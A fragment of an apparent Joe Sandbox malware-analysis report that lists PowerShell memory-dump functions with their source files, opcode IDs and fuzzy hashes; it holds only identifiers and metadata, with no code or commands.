                                                                                  • Source File: 00000005.00000002.2774353174.00007FFD9B7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b7b0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: de66291631d5d9c543116cc9990cf70b7d7e5e8b36b38d298dfa6fa696a5f988
                                                                                  • Instruction ID: de2e6273fcc581acedab173bed5e9404fbadbc105e546b95511e32156e25f1c8
                                                                                  • Opcode Fuzzy Hash: de66291631d5d9c543116cc9990cf70b7d7e5e8b36b38d298dfa6fa696a5f988
                                                                                  • Instruction Fuzzy Hash: 05B1B262A0F7DA0FEB6797A448715A47FA19F56314B0E41FED488CB0F3D9099D0ACB12
                                                                                  Function 00007FFD9B7B16CA Relevance: .1, Instructions: 138COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2774353174.00007FFD9B7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b7b0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0bfb112ecafb7e4abe1df4daa1a89d27dd79e1a3545e9881ffe1ba9721521e0b
                                                                                  • Instruction ID: 80c81815933274d65cf5eb392bdab4cc248eb5c9df5d2c7008b988bf8e1e5be8
                                                                                  • Opcode Fuzzy Hash: 0bfb112ecafb7e4abe1df4daa1a89d27dd79e1a3545e9881ffe1ba9721521e0b
                                                                                  • Instruction Fuzzy Hash: 90411413B2FB9B0BE7A996A804B51B876C2AF51250B5902BAD55DC79F2DD08AD014B01
                                                                                  Function 00007FFD9B6E3B45 Relevance: .0, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2773743928.00007FFD9B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6e0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                  • Instruction ID: 54af320e99b792673b94c8bce6dcfdfb950e5e690887b4ae8658d145e970d789
                                                                                  • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                  • Instruction Fuzzy Hash: C901A73020CB0C4FD748EF0CE051AA5B3E0FB95324F10056DE58AC36A5D732E881CB41